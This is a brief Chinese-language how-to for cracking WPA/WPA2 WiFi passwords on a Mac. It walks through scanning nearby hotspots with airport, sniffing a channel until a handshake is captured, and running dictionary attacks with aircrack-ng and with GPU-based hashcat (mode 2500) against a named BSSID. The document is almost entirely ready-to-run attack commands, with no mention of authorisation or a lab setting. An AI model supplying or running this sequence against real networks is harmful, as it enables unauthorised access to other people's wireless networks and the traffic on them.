注意
破解之前需要一个强大的字典库,根据字典库进行匹配密码。
命令步骤
步骤1
查看 WiFi 热点信息
1
airport -s
步骤2
嗅探抓取某个热点的连接信息
1
airport en0 sniff [CHANNEL]
- en0 - 无线网卡名称,可以通过
ifconfig
查看,不确定的话可以利用 Mac 网络设置对比IP/MAC
地址查看 - CHANNEL - 获取热点信息时所显示的
CHANNEL
值注意:嗅探抓取连接包的过程可能比较漫长,因为嗅探的这个 WiFi 需要有人对其进行握手连接,才能够抓取完整的协议包,然后我们才能下一步进行
步骤3
利用 aircrack
进行运算
以上抓取到的包或存放到 /tmp
临时目录,后置为 .cap
结尾,临时目录会在电脑重启之后自动清空。
1
aircrack-ng -w pwd.txt -b f0:b4:29:85:28:2e /tmp/airportSniffGEWiaa.cap
- -w - 指定一个字典文件
- -b - 这个是热点信息中的
BSSID
值
利用 hashcat
运算
此款工具更为强大,可以把 GPU
的运算利用起来进行破解,性能比 aircrack
高出许多。
把 cap
转换 hccapx
格式
1
aircrack-ng TP-LINK_FFDE.cap -b bc:46:99:f8:ff:de -j TP-LINK_FFDE
开始利用字典运算
1
hashcat -m 2500 TP-LINK_FFDE.hccapx wordlist/Top207-probable-v2.txt
最后
以上操作完毕之后就进行等待破解的结果吧,不一定 100%
破解哦,取决于字典文件的靠谱性。
FAQ
Airport Command Not Found
1
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
参考资料
http://topspeedsnail.com/macbook-crack-wifi-with-wpa-wpa2/
https://github.com/brannondorsey/wifi-cracking